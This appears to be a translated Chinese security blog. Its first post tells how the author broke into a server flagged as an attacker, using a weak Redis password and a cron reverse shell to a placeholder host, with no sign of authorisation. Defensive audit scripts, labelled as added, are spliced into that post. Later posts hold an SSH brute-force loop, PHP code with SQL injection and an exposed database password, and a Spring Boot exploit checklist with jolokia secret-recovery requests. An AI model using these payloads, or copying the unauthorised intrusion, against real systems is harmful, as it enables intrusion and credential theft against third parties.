Bin4xin: an attribution (溯源) incident record from my infosec career

Zero: Origin

  • One day, someone posted an attribution report in an HW (护网) red-team support group, and the chat fell silent

    • Client: Team, group HQ requires us to trace back the attacking IPs from the WAF / full-traffic platform…

      • 废佬: Uh… (client, you're adorable)
    • Manager 1: Tracing back to attacker-side information is a new area for us. I hope everyone treats this group-level assignment as a chance for exploratory learning, and identifies external tools and resources we can lean on; [@Bin4xin废佬] is joining the effort too.

      • 废佬: Uh… (boss, you're adorable)
    • Manager 2: file: 全流量、WAF4月8日-4月12日攻击IP(1).xlsx

      $ more 全流量、WAF4月8日-4月12日攻击IP\(1\).csv    
      223.214.211.46
      36.59.38.115
              
      $ more 全流量、WAF4月8日-4月12日攻击IP\(1\).csv|wc -l
      16570
      
      • 废佬: Uh… (boss, you're adorable)
  • And so 废佬 set off on a delightful boring attribution journey

One: Morning, happy hour & the fofa security engineer

Lu Xun:

A fofa security engineer who cannot do attribution is not a good information security engineer.

# 1x01: awk, split & linux

  • Before getting to the point, some simple preprocessing of the file:
      $ split -l 300 全流量、WAF4月8日-4月12日攻击IP\(1\).csv ips_preview_by300_
      $ cat ips_preview_by300_aa|wc -l                     
         300
      $ ll
        total 1400
        drwxr-xr-x  59 bin4xin  staff    1888  4 14 20:48 ./
        drwxr-xr-x+ 43 bin4xin  staff    1376  4 14 20:45 ../
        -rw-r--r--   1 bin4xin  staff    4548  4 14 20:48 ips_preview_by300_aa
        -rw-r--r--   1 bin4xin  staff    4457  4 14 20:48 ips_preview_by300_ab
        -rw-r--r--   1 bin4xin  staff    4481  4 14 20:48 ips_preview_by300_ac
        ··· 
    

    That gives us a set of small files of 300 IPs each, which makes it easier to filter out the IPs we care about. NEXT.

  • just fofa:
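Before handing 16570 lines to fofa it is worth validating and deduplicating them, and removing addresses that cannot be an external attacker at all (private, loopback and link-local ranges in a WAF export usually mean an internal scanner or a lost X-Forwarded-For header). The Python below is an added example, not part of the original post; it does the `split -l 300` batching programmatically on a constructed sample in the shape of the export, keeping hit counts so repeat sources float to the top.

```python
import ipaddress
from collections import Counter
from typing import Dict, Iterable, List

# Constructed sample in the shape of the WAF export (one IP per line); not the real 16570-line file.
SAMPLE_EXPORT = """223.214.211.46
36.59.38.115
223.214.211.46
10.0.0.5
192.168.1.20
not-an-ip
127.0.0.1
36.59.38.115
"""


def triage_ips(lines: Iterable[str]) -> Dict[str, object]:
    """Validate, dedupe and classify exported IPs before any external lookup.

    public   - globally routable addresses worth enriching (fofa, whois, passive DNS)
    internal - RFC1918 / loopback / link-local: not an external attacker, investigate the source instead
    invalid  - lines that are not IP addresses at all (export noise)
    hits     - occurrences per address, so repeated sources can be prioritised
    """
    hits: Counter = Counter()
    public: List[str] = []
    internal: List[str] = []
    invalid: List[str] = []
    for raw in lines:
        s = raw.strip()
        if not s:
            continue
        try:
            ip = ipaddress.ip_address(s)
        except ValueError:
            invalid.append(s)
            continue
        hits[s] += 1
        if hits[s] > 1:
            continue  # already classified on first sight
        (public if ip.is_global else internal).append(s)
    return {"public": public, "internal": internal, "invalid": invalid, "hits": dict(hits)}


def chunk(items: List[str], size: int) -> List[List[str]]:
    """Split a list into batches of `size`: the programmatic equivalent of `split -l`."""
    if size <= 0:
        raise ValueError("size must be positive")
    return [items[i:i + size] for i in range(0, len(items), size)]


if __name__ == "__main__":
    result = triage_ips(SAMPLE_EXPORT.splitlines())
    for n, batch in enumerate(chunk(result["public"], 300)):
        print(f"batch {n}: {batch}")
    print("internal (not attributable externally):", result["internal"])
    print("invalid lines:", result["invalid"])
```

On a real export, write each batch to its own file and feed only the `public` list to the lookup service; the `internal` list is a finding in itself about how the WAF records client addresses.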

# 1x02: Something Interesting

The happy but short morning passed in a flash.


Two: Afternoon, tedious hours & the penetration-test engineer

# 2x01: nmap, nc & linux shell

Finally, something interesting turned up:

PORT     STATE  SERVICE         VERSION
22/tcp   open   ssh             OpenSSH 6.6.1 (protocol 2.0)
| ssh-hostkey: 
|   2048 fe:03:b9:0b:7b:ab:3f:bf:cd:60:93:57:52:4e:a6:c5 (RSA)
|   256 9d:97:b5:fb:db:92:ed:a7:e3:dd:f9:5f:86:b5:e3:b4 (ECDSA)
|_  256 7b:65:cf:48:84:15:82:ca:be:46:3c:cf:93:63:07:f1 (ED25519)
80/tcp   open   http            nginx
| http-ls: Volume /
| SIZE  TIME               FILENAME
| -     24-Feb-2021 13:21  admin/
| -     24-Feb-2021 09:27  redis/
| -     24-Aug-2017 04:55  staragent/
| -     24-Feb-2021 08:44  www/
| -     24-Feb-2021 08:44  www/htdocs/
| -     13-Apr-2021 19:44  www/logs/
|_
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-title: Index of /
888/tcp  open   http            nginx
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-title: 404 Not Found
3306/tcp open   mysql           MySQL 5.5.62-log
6379/tcp open   redis           Redis key-value store
8080/tcp open   http            Apache Tomcat 8.5.63
|_http-favicon: Apache Tomcat
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-title: Apache Tomcat/8.5.63
8888/tcp open   http            Ajenti http control panel
  • In fact this is a 宝塔 (BT) panel, on ports 8888 and 888;
  • The other fact: this IP, reported by the WAF as an attacking IP for April 8-12, had weak passwords on both mysql and redis.
$ ./redis-cli -h redis_target_ip           
redis_target_ip:6379> get key
(error) NOAUTH Authentication required.
redis_target_ip:6379> 
redis_target_ip:6379> auth 123456
OK
redis_target_ip:6379> get key
(nil)
redis_target_ip:6379> set  xx   "\n* * * * * bash -i >& /dev/tcp/your_vps_target/port 0>&1\n"
OK
redis_target_ip:6379> config set dir /var/spool/cron/
OK
redis_target_ip:6379> config set dbfilename root
OK
redis_target_ip:6379> save
OK
redis_target_ip:6379> quit
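The session above works only because Redis accepted a guessable password and left CONFIG SET reachable, so the RDB dump could be pointed at /var/spool/cron. The Python below is an added example, not part of the original post: it audits a redis.conf text for exactly those settings, against a constructed weak configuration and its hardened counterpart. The password and file contents are made up; note that a conf audit cannot see that the daemon runs as root, which the ps output further down shows, so check that separately.

```python
from typing import Dict, List, Tuple

# Constructed sample: roughly the posture the redis session above implies.
WEAK_CONF = """
port 6379
bind 0.0.0.0
protected-mode no
requirepass 123456
dir /var/lib/redis
"""

# Constructed sample: the hardened counterpart. The password is a made-up placeholder.
HARDENED_CONF = """
port 6379
bind 127.0.0.1
protected-mode yes
requirepass "Kq7zR2pL9vX4mT8wB3nH"
rename-command CONFIG ""
rename-command SAVE ""
"""

COMMON_PASSWORDS = {"123456", "12345678", "password", "redis", "admin", "root", "foobared"}
MIN_PASSWORD_LEN = 16


def parse_redis_conf(text: str) -> Dict[str, List[str]]:
    """Map each directive to the list of its values (directives such as rename-command repeat)."""
    conf: Dict[str, List[str]] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        name, _, value = line.partition(" ")
        conf.setdefault(name.lower(), []).append(value.strip())
    return conf


def audit_redis_conf(text: str) -> List[Tuple[str, str]]:
    """Return (code, explanation) findings for the settings the cron-write abuse above depends on."""
    conf = parse_redis_conf(text)
    findings: List[Tuple[str, str]] = []

    password = conf.get("requirepass", [""])[-1].strip('"')
    if not password:
        findings.append(("NO_AUTH", "requirepass unset: any client that reaches the port has full access"))
    elif len(password) < MIN_PASSWORD_LEN or password.lower() in COMMON_PASSWORDS:
        findings.append(("WEAK_AUTH", "requirepass is short or a common password; AUTH is guessed in seconds"))

    if conf.get("protected-mode", ["yes"])[-1].lower() != "yes":
        findings.append(("PROTECTED_MODE_OFF", "protected-mode no removes the fallback guard for unbound, unauthenticated instances"))

    bind_values = " ".join(conf.get("bind", [])).split()
    if not bind_values or any(b in ("0.0.0.0", "*", "::") for b in bind_values):
        findings.append(("BIND_ALL", "instance listens on every interface; bind it to loopback or the application network"))

    # rename-command <NAME> "" disables a command; any other rename hides it behind an unguessable alias.
    renamed = {v.split()[0].upper() for v in conf.get("rename-command", []) if v.split()}
    for cmd in ("CONFIG", "SAVE"):
        if cmd not in renamed:
            findings.append((f"{cmd}_EXPOSED",
                             f"{cmd} reachable by name; CONFIG SET dir/dbfilename plus SAVE is what writes the dump into /var/spool/cron"))
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, audit_redis_conf(conf) or "no findings")
```

The same checks can be run against a live instance's `CONFIG GET *` output once CONFIG is aliased, which is the point: the audit should pass from the outside as well as on disk.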

# 2x02: bash, information gathering & the traceability incident

So with the steps above we obtained access to the server; awesome? next more awesome.

Gathering information on the server felt like looking at my 2019 self, when I had just started touching servers. No mockery intended, everyone was a beginner once;

NO OFFENCE :-) Thanks

  • Get to know Linux and Linux panels better, otherwise you look very amateurish, whether you are in development, operations and maintenance, or security;
    • Too many ssh connections, caused by scant Linux knowledge:
        ps -ef|grep ssh|wc -l
        50
      
    • Chaotic terminal and database command history:
        $ cat /home/admin/.bash_history 
        sudo grep wordpress_admin_passwd /root/env.txt
        /usr/local/mysql/bin/mysql -u root -p123456
        sudo su rooe
        sudo su root
        sudo grep mysql_root_passwd /root/env.txt
        mysql
        alias mysql=/usr/local/mysql/bin/mysql
        mysql
        find / -name mysql.sock
        sudo grep mysql_root_passwd /root/env.txt
        msyql
        sudo su root
        grant all privileges on *.* to 'root'@'%' identified by 'pass-hidden';
        grant all privileges on *.* to 'root'@'%' identified by '123456';
      
    • Wrong Linux privilege assignment:
        $ ps -ef|grep root
        root      7963     1  0 Mar06 ?        00:39:39 /usr/bin/java -Djava.util.logging.config.file=/www/server/apache-tomcat-8.5.63/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 -Dignore.endorsed.dirs= -classpath /www/server/apache-tomcat-8.5.63/bin/bootstrap.jar:/www/server/apache-tomcat-8.5.63/bin/tomcat-juli.jar -Dcatalina.base=/www/server/apache-tomcat-8.5.63 -Dcatalina.home=/www/server/apache-tomcat-8.5.63 -Djava.io.tmpdir=/www/server/apache-tomcat-8.5.63/temp org.apache.catalina.startup.Bootstrap start
        root     23017     1  0 Mar06 ?        00:00:00 nginx: master process nginx -c conf/nginx.conf
        root     27803     1  0 Feb25 ?        01:17:18 ./redis-server *:6379
        ···
      
  • Likewise: the panel admin password was found through history;
    • tools.py from the BT panel:
        $ cat /root/.bash_history |grep tools
        cd /www/server/panel && python tools.py panel pass-hidden
        $ cat /www/server/panel/tools.py
              
        if __name__ == "__main__":
            type = sys.argv[1]
            if type == 'root':
                set_mysql_root(sys.argv[2])
            elif type == 'panel':
                set_panel_pwd(sys.argv[2])
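
The ps -ef and .bash_history excerpts above show the two host-hygiene problems that made this box trivial to take over: network services running as root, and a MySQL root account granted to '%' with its password typed on the command line. The Python below is an added example, not from the original post: it parses ps -ef output and shell history into findings. The sample lines are modelled on the output above, with a constructed nginx worker, mysqld and report-account line added for contrast.

```python
import re
from typing import Dict, List, Tuple

# Modelled on the ps -ef output above (command columns shortened); the header, the nginx worker
# and the mysqld line are constructed for contrast.
PS_OUTPUT = """\
UID        PID  PPID  C STIME TTY          TIME CMD
root      7963     1  0 Mar06 ?        00:39:39 /usr/bin/java -Dcatalina.base=/www/server/apache-tomcat-8.5.63 org.apache.catalina.startup.Bootstrap start
root     23017     1  0 Mar06 ?        00:00:00 nginx: master process nginx -c conf/nginx.conf
www      23018 23017  0 Mar06 ?        00:00:12 nginx: worker process
root     27803     1  0 Feb25 ?        01:17:18 ./redis-server *:6379
mysql     1201     1  0 Feb25 ?        00:05:01 /usr/local/mysql/bin/mysqld
"""

# Modelled on the .bash_history above; the last line (a scoped, host-restricted grant) is constructed.
HISTORY = """\
sudo grep mysql_root_passwd /root/env.txt
/usr/local/mysql/bin/mysql -u root -p123456
grant all privileges on *.* to 'root'@'%' identified by 'pass-hidden';
grant all privileges on *.* to 'root'@'%' identified by '123456';
grant select on app.* to 'report'@'10.0.0.%' identified by 'R3p0rt-r0-2021!x';
"""

# Substrings identifying services that must not run as root. The nginx master legitimately stays
# root to bind :80 and read keys; its workers must have dropped privileges.
ROOT_FORBIDDEN = {
    "redis-server": "Redis as root: the CONFIG SET dir + SAVE write into /var/spool/cron (2x01) runs as root",
    "/java": "JVM/Tomcat as root: any webapp deployment or deserialization bug yields a root shell",
    "mysqld": "MySQL as root: the FILE privilege reads and writes any path on the host",
    "nginx: worker": "nginx worker as root: privileges were never dropped",
}

COMMON_PASSWORDS = {"123456", "12345678", "password", "root", "admin", "mysql"}
GRANT_RE = re.compile(
    r"grant\s+(?P<privs>.+?)\s+on\s+(?P<scope>\S+)\s+to\s+'(?P<user>[^']*)'@'(?P<host>[^']*)'"
    r"(?:\s+identified\s+by\s+'(?P<password>[^']*)')?",
    re.IGNORECASE,
)


def parse_ps(text: str) -> List[Dict[str, str]]:
    """Parse `ps -ef` output (UID PID PPID C STIME TTY TIME CMD) into dicts, skipping the header."""
    rows: List[Dict[str, str]] = []
    for line in text.splitlines()[1:]:
        parts = line.split(None, 7)
        if len(parts) == 8:
            rows.append(dict(zip(("uid", "pid", "ppid", "c", "stime", "tty", "time", "cmd"), parts)))
    return rows


def root_services(ps_text: str) -> List[Tuple[str, str]]:
    """(pid, reason) for every forbidden service whose owner is root."""
    found: List[Tuple[str, str]] = []
    for row in parse_ps(ps_text):
        if row["uid"] != "root":
            continue
        for needle, reason in ROOT_FORBIDDEN.items():
            if needle in row["cmd"]:
                found.append((row["pid"], reason))
                break
    return found


def risky_history(history_text: str) -> List[Tuple[str, str]]:
    """(code, line) for credential-handling mistakes visible in a shell history."""
    found: List[Tuple[str, str]] = []
    for line in history_text.splitlines():
        line = line.strip()
        if re.search(r"\s-p\S+", line):
            found.append(("PASSWORD_ON_CLI", line))  # lands in history and in `ps` for the process lifetime
        m = GRANT_RE.search(line)
        if not m:
            continue
        if m["host"] == "%":
            found.append(("WILDCARD_HOST", line))  # account usable from any source address
        if "all privileges" in m["privs"].lower() and m["scope"] == "*.*":
            found.append(("ALL_PRIVS_GLOBAL", line))
        pw = m["password"]
        if pw is not None and (len(pw) < 8 or pw.lower() in COMMON_PASSWORDS):
            found.append(("WEAK_PASSWORD", line))
    return found


if __name__ == "__main__":
    for pid, reason in root_services(PS_OUTPUT):
        print(f"pid {pid}: {reason}")
    for code, line in risky_history(HISTORY):
        print(f"{code}: {line}")
```

Combined with the 3306 and 6379 exposure in the nmap output, a `'root'@'%'` grant with a six-digit password is the whole story of how this host was reachable; the parser is deliberately tolerant so it can be pointed at every user's history file on a box during triage.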
      

So in panel mode it sets the panel password;

At this point we had root, redis, mysql and the BT panel; but this post is not about showing off, our purpose was attribution:

  • mysql: the database only holds the forum system's admin data and test data;
  • redis: works alongside mysql, nothing more to say;
  • BT panel: www, ftp, sql and the rest are all basic configurations, nothing of reference value.

Three: Summary

  • 1. This post exists to kick off discussion on information gathering and attribution; the writing is not great;
  • 2. Taking # 2x01 and # 2x02 together, no signs or traces of attack were found anywhere;
  • 3. Why it was reported as an attacking IP remains unknown.

Four: Statement

Author: Bin4xin

When reposting, please cite this post's link: Bin4xin: an attribution (溯源) incident record from my infosec career

That's all.

[Read More]

Xinchou, my zodiac year: some thoughts after the New Year

Mar 13, 2021. | By: Bin4xin

It has been almost a month since I came back to Hefei after the New Year. This is my zodiac year, and I hope I can work even harder than in 2020. Back at the company, I have been busy with meaningful things according to plan:

  • Everything is proceeding in an orderly fashion:

According to the New Year plan, what I need to consolidate next is the Shiro framework. Straight after the holiday came HW (护网); in 2020 I relied on Shiro to "win a lot of ground" for the company during HW, and this year I should understand it more deeply;

Some idle talk:

After the holiday I squeezed in an offline meetup with the kids from the school's cybersecurity lab. Its main content was summarising their learning since the winter break and having them report what they had learned; since they are young, mostly first- and second-year students, I occasionally also had to answer their questions about the puzzles of university life;

  • Cybersecurity lab team organisation:
    • Mentor: the soul of the team;
    • My role: I think my role in this team is to be the industry "veteran" who supervises and advises on their study plans.
    • Attack team (red team) requirements:
      • 1. Be familiar with the characteristics and exploitation principles of the various vulnerability classes;
      • 2. Be able to read what a PoC does, and have some programming and code-audit ability of your own;
      • 3. Be familiar with identifying the mainstream WAFs, probing their rules, bypassing them, and with the assets behind a WAF.
    • Defence team (blue team) requirements:
      • 1. Be familiar with the root causes of vulnerability classes, keep up with the 0day/1day/Nday disclosures on the Internet, and understand the frequently vulnerable components in depth, such as WebLogic deserialization, Shiro deserialization and the various (SQL, template) injections;
      • 2. Be familiar with how the mainstream operating systems, Linux and Windows, work: building and installing software, operating a cluster independently, and tracing security incidents;
      • 3. Be able to independently deploy security (audit) platforms or tools, such as a WAF and the rule-writing that WAF work involves.
    • Data mining, involving algorithm applications and so on; not much to say.
    • Development; not much to say.

  • Current problems:

How to build a professional team in today's cybersecurity environment:
|__ 1. Can the cybersecurity lab form a CTF team?
|__ 2. A professional enterprise security-services team?

  • Problem 1, on the CTF team: I think the resources we have right now are the best opportunity:
    • We have the guidance of a mentor in the field, and a pool of students to compete in CTFs
      • Pick a captain to keep the team cohesive and energetic;
      • Management should adopt competition-style military discipline, including morning runs and internal attack-defence training matches
    • Matching students to the team:
      • Problems in selecting students:
        • Perhaps when selecting for the lab, every freshman with an interest in the field should be let in. I have always believed that university life is the process of discovering one's own interests, and that training them is at the same time assessing them;
        • Because the current problems are fairly obvious.
      • Some young freshmen cannot keep pace with the team and are dropped;
      • A small number cause various problems of their own

[Read More]

GainPower lab penetration walkthrough

Dec 2, 2020. | By: Bin4xin

  • employee1: the ssh banner reveals the problem;
    • Get a low-privilege shell from the hint
  • employee64: tests scripting ability (ssh brute force)
    • Bash script for batch connections
  • programmer: get a sudo shell
    • Switch to the sudo user via unshare
    • $ su - employee64
    • $ sudo -u programmer unshare
  • vanshal: get a shell via a crontab job
    • pspy tool to detect it
    • /media/programmer/scripts/backup.sh
  • root: secret zip file
    • zip password crack
    • login to ajenti to run a root shell.

Let's write a script to batch-try them:

#!/bin/bash

pwn () {
  read -p 'target ip: ' ip
  sleep 2
  for data in {1..100}
  do
      echo 'Try: ' $data
      sshpass -p 'employee'$data ssh employee$data@$ip 'echo employee'$data' | sudo -S -l'
      printf "\n"
  done
}

pwn

Loop over username/password pairs {employee+$data} in {1..100}, authenticate over ssh in batch with sshpass, and try sudo; a failure looks like:

[sudo] employee100 的密码:对不起,用户 employee100 不能在 localhost 上运行 sudo。

成功:

[sudo] employee64 的密码:匹配 %2$s 上 %1$s 的默认条目:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

用户 employee64 可以在 localhost 上运行以下命令:
    (programmer) /usr/bin/unshare

So user employee64 does have sudo rights;

[Read More]

PHP: a bundle of deployment problems

Nov 25, 2020. | By: Bin4xin

[Wed Nov 25 17:19:33.475439 2020] [php7:notice] [pid 11872] [client 10.211.55.2:53568] PHP Notice:  Undefined index: step in /var/www/html/code/BabyOnline1/setup/setupwizard.php on line 4
[Wed Nov 25 17:19:33.475577 2020] [php7:error] [pid 11872] [client 10.211.55.2:53568] PHP Fatal error:  Uncaught Error: Class 'DOMDocument' not found in /var/www/html/code/BabyOnline1/setup/setupwizard.php:46\nStack trace:\n#0 {main}\n  thrown in /var/www/html/code/BabyOnline1/setup/setupwizard.php on line 46
[Wed Nov 25 17:21:46.224793 2020] [php7:error] [pid 11882] [client 10.211.55.2:53602] PHP Fatal error:  Uncaught Error: Call to undefined function mysqli_connect() in /var/www/html/code/BabyOnline1/utility/mysqli5.php:39\nStack trace:\n#0 /var/www/html/code/BabyOnline1/utility/fun.class.php(281): Conn->__construct('localhost', '3306', 'root', 'tsinglink', 'qx_bbol', 'UTF8', true)\n#1 /var/www/html/code/BabyOnline1/utility/fun.class.php(255): Utility->CreateDBConnect('localhost', '3306', 'root', 'tsinglink', 'qx_bbol', 'UTF8')\n#2 /var/www/html/code/BabyOnline1/platform/php/ini.php(41): Utility->__construct()\n#3 /var/www/html/code/BabyOnline1/platform/php/plat_manage.php(5): require_once('/var/www/html/c...')\n#4 {main}\n  thrown in /var/www/html/code/BabyOnline1/utility/mysqli5.php on line 39, referer: http://10.211.55.4/platform/

The log points to /var/www/html/code/BabyOnline1/utility/fun.class.php(281), /var/www/html/code/BabyOnline1/platform/php/ini.php(41) and /var/www/html/code/BabyOnline1/utility/mysqli5.php on line 39

The first file, fun.class.php, implements writing logs into the database;

function WriterToDB($typeid,$clientAddress,$datetime,$file,$line,$function,$content)
{
    global $utility;
    if(is_array($content))
    {
        $conn = $utility->CreateDBConnect($_SESSION["DB"]["Host"],$_SESSION["DB"]["Port"],$_SESSION["DB"]["User"],$_SESSION["DB"]["Password"],$_SESSION["DB"]["Name"],$_SESSION["DB"]["Character"]);
        $conn->Query("INSERT INTO `NMIOperationLog` (`Index`,`Operation`,`OperationTime`,`Description`,`ManageDomainUserInfo_Index`,`ManageDomain_Index`,`ManageDomainUserInfo_Identity`,`ManageDomains`,`SqlScript`)VALUES(null,'".$content["Operation"]."','".$content["OperationTime"]."','".addslashes($content["Description"])."','".$content["ManageDomainUserInfo_Index"]."','".$content["ManageDomain_Index"]."','".$content["ManageDomainUserInfo_Identity"]."','".$content["ManageDomains"]."','".addslashes($content["SqlScript"])."') ");

        //$log->Writer(1,"NMI",strftime("%Y-%m-%d %H:%M:%S",time()),__FILE__,__LINE__,__FUNCTION__,mysql_error());
    }
    return true;
}

The WriterToDB database-write logic is as above; likewise, ini.php defines the database configuration, including type, URL and connection information:

define('LOGSAVETYPE',1);
define('LOGLEVEL',1);

define('DB_TYPE', "mysql"); 
define('IMAGE_URL', "http://61.191.35.32:8580/BabyOnline/");
define('DB_SOURCEFILE_PATH',dirname(dirname(dirname(__FILE__)))."/utility/dbsource.ini");

dbsource.ini holds the detailed jdbc configuration, which I won't post separately; now for the last file, which also connects to the database, and where I found something interesting. A few functions picked at random:

function QueryRecordCount($sqlstr)
{
    if($this->connect)
    {
        unset($row);
        $row=$this->FetchArray($this->Query("SELECT count(1) as RecordCount FROM ".$sqlstr." "));
        return ($row['RecordCount'] > 0 ? $row['RecordCount'] : 0);
    }
    else
    {
        return 0;
    }
}


if($link->FetchArray($link->query("SELECT * FROM User WHERE `Identity`='$UserId' AND AreaCode='$AreaCode'")))
{
    ···
}

Ahem, I digress. From the above, editing the ini file is all that's needed.

[Read More]

Some thoughts on the cybersecurity industry

Sep 25, 2020. | By: Bin4xin

Under construction



In an era where the cybersecurity industry is trending toward commercialisation, how do we keep a sincere heart:

  • The trend of today's cybersecurity should sit under the overarching premise of national security:
    • Education should be the "living spring" of cybersecurity, feeding this young industry enough young blood, so right now:
      while fully exercising its educational function, it should give the students of applied and research programmes the guidance they need;
      because many students and teachers today cannot see themselves clearly within this industry, and so never do the right thing at the right time;

    • Enterprises also play an important role here: obviously, traditional security vendors face a choice:
    • adapt to the market, or set the rules of the game themselves;
      • Most traditional security vendors chose to adapt to the market
        • security-services demand; CTF demand; satisfying MIIT inspections, and so on…
      • Vendors such as 爱加密:
        • create their own demand and their own rules of the game.

Give students in their internship period proper career guidance. The cybersecurity industry will not become a national lifeline industry in the next ten years; it is known to the public merely in the form of security services. Today's cybersecurity industry:

National level: CTF competitions; HW (护网) exercises; security assurance for major holidays

Enterprise level: MIIT bureau inspections; 等保 (MLPS); protecting the company's own business (generally, the more a company's own business has security needs, the more likely it is to have its own security team)

Individual level: personal data, privacy and property issues;

Zero: my view on today's CTF competitions in the cybersecurity industry

[Read More]

Must-discuss: unauthorised "Spring Boot" penetration

Sep 25, 2020. | By: Bin4xin (edit). Source: LandGrey

Spring Boot Vulnerability Exploit CheckList

A collection of learning material, exploitation methods and tricks for Spring Boot related vulnerabilities; a black-box security assessment checklist

Statement

This is a repost; if the original author objects, please contact 「chihou.pro@gmail.com」 to have the repost removed

Contents

Zero: Routes and versions

0x01: Route knowledge

  • In Spring Boot 1.x the default built-in routes are rooted at /, in 2.x they all start with /actuator
  • Some developers set a custom root such as /manage, /management or a project-specific name
  • The default built-in route names, such as /env, are sometimes renamed by developers too, e.g. to /appenv

0x02: Version knowledge

Spring Cloud is an ordered collection of frameworks built on Spring Boot that provides common functions such as configuration management, service registration and discovery, and intelligent routing, to help build distributed systems quickly.

Version interdependencies of common components:

Dependency                  Version list and dependent component versions
spring-boot-starter-parent  spring-boot-starter-parent
spring-boot-dependencies    spring-boot-dependencies
spring-cloud-dependencies   spring-cloud-dependencies

Dependencies between Spring Cloud and Spring Boot major versions:

Spring Cloud  Spring Boot
Angel         compatible with Spring Boot 1.2.x
Brixton       compatible with Spring Boot 1.3.x, 1.4.x
Camden        compatible with Spring Boot 1.4.x, 1.5.x
Dalston       compatible with Spring Boot 1.5.x, not with 2.0.x
Edgware       compatible with Spring Boot 1.5.x, not with 2.0.x
Finchley      compatible with Spring Boot 2.0.x, not with 1.5.x
Greenwich     compatible with Spring Boot 2.1.x
Hoxton        compatible with Spring Boot 2.2.x

Spring Cloud minor-version suffixes and their meaning:

Suffix          Meaning
BUILD-SNAPSHOT  snapshot build; the code is not fixed and still changing
MX              milestone release
RCX             release candidate
RELEASE         general availability release
SRX             service release (a GA release re-issued with bug fixes)

One: Information leakage

0x01: Route addresses and API call details leaked

When the development environment is switched to production, staff did not change the configuration file or forgot to switch profiles, leading to this issue

Access the following routes directly to verify whether the issue exists:

/api-docs
/v2/api-docs
/swagger-ui.html

Some variants of the API routes you may encounter:

/api.html
/sw/swagger-ui.html
/api/swagger-ui.html
/template/swagger-ui.html
/spring-security-rest/api/swagger-ui.html
/spring-security-oauth-resource/swagger-ui.html

Apart from these, the routes below sometimes also contain (or allow inferring) API address information, but no parameter details:

/mappings
/actuator/mappings
/metrics
/actuator/metrics
/beans
/actuator/beans
/configprops
/actuator/configprops

Generally speaking, knowing a Spring Boot application's API endpoints and their parameters is not in itself a vulnerability,

but the exposed endpoints can then be checked for unauthorised access, privilege escalation or other business-logic flaws.

0x02: Routes exposed through misconfiguration

Mainly because developers did not realise that exposed routes could pose a security risk, or did not follow the standard process and forgot to change/switch to the production configuration when going live

Referring to production-ready-endpoints and spring-boot.txt, the default built-in routes that may be exposed through misconfiguration include:

/actuator
/auditevents
/autoconfig
/beans
/caches
/conditions
/configprops
/docs
/dump
/env
/flyway
/health
/heapdump
/httptrace
/info
/intergrationgraph
/jolokia
/logfile
/loggers
/liquibase
/metrics
/mappings
/prometheus
/refresh
/scheduledtasks
/sessions
/shutdown
/trace
/threaddump
/actuator/auditevents
/actuator/beans
/actuator/health
/actuator/conditions
/actuator/configprops
/actuator/env
/actuator/info
/actuator/loggers
/actuator/heapdump
/actuator/threaddump
/actuator/metrics
/actuator/scheduledtasks
/actuator/httptrace
/actuator/mappings
/actuator/jolokia
/actuator/hystrix.stream

Of these, the endpoints that matter most for finding vulnerabilities are:

  • /env, /actuator/env

    A GET on /env leaks environment variables, or some usernames from the configuration; when the developer named properties non-standardly (e.g. password spelled psasword, or pwd), passwords leak in plaintext;

    There is also some chance that a POST to /env can set properties and trigger the related RCE vulnerabilities.

  • /jolokia

    Use the /jolokia/list endpoint to find exploitable MBeans and trigger the related RCE vulnerabilities;

  • /trace

    Tracing information for some HTTP requests, which may reveal valid cookies

0x03: Recovering a password masked with asterisks (method one)

When /env is accessed, Spring Actuator replaces the values of properties whose names contain sensitive keywords (such as password, secret) with * to mask them

Preconditions:

  • The target exposes /jolokia or /actuator/jolokia
  • The target uses the jolokia-core dependency (version requirements not yet known)

Method:

Step 1: find the property name you want

GET the target's /env or /actuator/env, search for ******, and find the name of the property whose value is masked with *.

Step 2: call the relevant MBean through jolokia to get the plaintext

Replace security.user.password in the examples below with the property name you actually want and send the request; the plaintext is in the value key of the response.

  • Call the org.springframework.boot MBean (probably more general)

This actually calls the getProperty method of the org.springframework.boot.admin.SpringApplicationAdminMXBeanRegistrar instance

spring 1.x

POST /jolokia
Content-Type: application/json

{"mbean": "org.springframework.boot:name=SpringApplication,type=Admin","operation": "getProperty", "type": "EXEC", "arguments": ["security.user.password"]}

spring 2.x

POST /actuator/jolokia
Content-Type: application/json

{"mbean": "org.springframework.boot:name=SpringApplication,type=Admin","operation": "getProperty", "type": "EXEC", "arguments": ["security.user.password"]}

  • Call the org.springframework.cloud.context.environment MBean (requires spring cloud dependencies)

This actually calls the getProperty method of the org.springframework.cloud.context.environment.EnvironmentManager instance

spring 1.x

POST /jolokia
Content-Type: application/json

{"mbean": "org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager","operation": "getProperty", "type": "EXEC", "arguments": ["security.user.password"]}

spring 2.x

POST /actuator/jolokia
Content-Type: application/json

{"mbean": "org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager","operation": "getProperty", "type": "EXEC", "arguments": ["security.user.password"]}

0x04: Recovering a password masked with asterisks (method two)

When /env is accessed, Spring Actuator replaces the values of properties whose names contain sensitive keywords (such as password, secret) with * to mask them

Preconditions:

  • GET requests to the target's /env are possible
  • POST requests to the target's /env are possible
  • POST requests to the target's /refresh endpoint can reload the configuration (spring-boot-starter-actuator present)
  • The target uses the spring-cloud-starter-netflix-eureka-client dependency
  • The target can reach the attacker's server (outbound requests allowed)

Method:

